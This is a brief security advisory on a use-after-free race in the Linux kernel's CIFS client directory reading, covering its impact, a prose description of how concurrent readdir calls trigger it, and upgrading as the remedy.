Linux Kernel CIFS Client Use-After-Free Vulnerability in Directory Reading

A use-after-free vulnerability has been identified in the CIFS client of the Linux kernel, specifically within the directory reading process. This issue arises from a race condition that allows the readdir operation to access a response buffer after it has been freed, leading to potential memory corruption. The vulnerability triggers a KASAN (Kernel Address Sanitizer) warning, indicating a slab-use-after-free error. The problem occurs in Linux kernel version 6.15.0-rc6 and has been addressed in subsequent releases.

Impact

Exploitation of this vulnerability can lead to memory corruption, allowing for potential arbitrary code execution or causing a denial-of-service condition by crashing the system.

Reproduction

The vulnerability can be reproduced by running a program that performs concurrent directory read operations using the CIFS file system. This can be done by mounting a CIFS share and then using multiple processes to read the directory contents simultaneously. The race condition will cause one process to access the response buffer of another process after it has been freed, triggering the use-after-free vulnerability.

Remediation

Users can upgrade to the latest stable version of the Linux kernel where this vulnerability has been fixed. Instructions for upgrading the kernel can be found in the official Linux kernel documentation or through the package management system of the Linux distribution in use.